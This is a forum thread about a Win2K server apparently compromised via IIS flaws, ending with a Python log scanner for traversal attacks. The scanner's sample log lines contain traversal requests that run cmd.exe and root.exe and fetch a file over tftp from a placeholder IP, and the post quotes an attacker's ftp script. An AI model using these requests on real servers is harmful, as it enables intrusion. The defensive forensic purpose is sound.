
    Suspicious files


    by kevin at alexander group

    On a routine check of a client’s Win2K Server, I found the following files in the root of C:.
    superrofl.exe, info.exe, root.exe, shell.exe, and ftp.txt. The txt file contained the following text:

        open ur momma
        get CDIR.txt c:\CDIR.txt

    I have removed the files from the system (but kept copies). I have found no information on any attack or exploit along these lines. I was interested if anyone had information or suggestions for any other checks I should do.

All Comments


      Suspicious files

      by blackdiamond

      In reply to Suspicious files


      Root.exe can be related to the Code Red virus. I would make sure that you do a Virus scan with an AV program that is running the latest scan definitions.

      If you are running 2000 with IIS installed make sure that it is updated with the latest Microsoft patches.



      Suspicious files

      by riverfreight

      In reply to Suspicious files

      Go to Discussions and read ‘Data transfer & Access’.

      With that, this: it has been found that a lot of components are used in the supposedly new box; and is it possible that there is an after hours user or someone who lost it in a transfer and it found a home here?



      Suspicious files

      by curacao_dejavu

      In reply to Suspicious files

      Here’s the link on the various security tools for MS products.



      Reply To: Suspicious files

      by joseph moore

      In reply to Suspicious files

      This server has been compromised, from what I have read. I think it is a “rootkit” which is never good.
      The server probably needs to be patched now. I bet it is not on SP3, is it? If not, then it is vulnerable to the IIS Unicode Directory Traversal Exploit that did make CodeRed and Nimda so popular.
      Lock this machine down now! Run anti-virus software on it to detect trojan files. Check out the firewall settings on whatever firewall protects it (if it IS protected by a firewall).
      I think that “superrofl.exe” is a command prompt that allows the directory traversal to happen.

      Sorry for the bad news.
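One concrete follow-up check for the original question, added here as an example and not code from anyone in the thread: the IIS Unicode traversal and the Code Red / Nimda "root.exe" backdoor leave recognisable requests in the IIS W3C logs, so scanning those logs for encoded traversal sequences, requests for cmd.exe or root.exe, and tftp/ftp commands in the query string shows which client addresses were driving the box and when. The log lines, the field layout and the IPs below are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed IIS 5.0 W3C-style log lines (sample data, not from the thread):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2002-03-01 10:15:01 192.0.2.10 GET /default.htm - 200
2002-03-01 10:15:07 198.51.100.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2002-03-01 10:15:09 198.51.100.7 GET /scripts/root.exe /c+dir+c:\\ 200
2002-03-01 10:15:12 198.51.100.7 GET /msadc/..%255c../..%255c../winnt/system32/cmd.exe /c+tftp+-i+198.51.100.7+GET+ftp.txt 200
2002-03-01 10:16:00 192.0.2.11 GET /images/logo.gif - 200
"""

# Overlong UTF-8 and double-encoded forms of "/" and "\" that the IIS Unicode and
# double-decode traversal bugs accepted, plus the shells the thread mentions.
TRAVERSAL = re.compile(r"%c0%af|%c1%9c|%c1%1c|%c0%2f|%c0%5c|%255c|%252f|\.\.%5c", re.I)
SHELLS = re.compile(r"/(cmd|root)\.exe$", re.I)
TRANSFER = re.compile(r"\b(tftp|ftp)\b", re.I)

def classify(line):
    """Return the reasons a log line looks like traversal/backdoor use ([] if clean)."""
    parts = line.split()
    if len(parts) < 7:
        return []
    stem, query = parts[4], parts[5]
    # Decode twice so %255c -> %5c -> "\" and treat "\" like "/" as IIS does.
    decoded = unquote(unquote(stem)).replace("\\", "/")
    reasons = []
    if TRAVERSAL.search(stem) or "/../" in decoded:
        reasons.append("directory traversal in URI")
    if SHELLS.search(stem):
        reasons.append("request for a command shell executable")
    if TRANSFER.search(unquote(query).replace("+", " ")):
        reasons.append("file transfer command in query string")
    return reasons

def suspicious_requests(log_text):
    """Group flagged requests by client IP: {ip: [(uri_stem, reasons), ...]}."""
    hits = {}
    for line in log_text.splitlines():
        reasons = classify(line)
        if reasons:
            parts = line.split()
            hits.setdefault(parts[2], []).append((parts[4], reasons))
    return hits

if __name__ == "__main__":
    for ip, entries in suspicious_requests(SAMPLE_LOG).items():
        for stem, reasons in entries:
            print(f"{ip}  {stem}  <- {'; '.join(reasons)}")
```

Run it against the real %SystemRoot%\system32\LogFiles\W3SVC1\*.log files (the field order there depends on the site's logging settings, so adjust the column indexes) and the first flagged timestamp gives a starting point for the rest of the investigation.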
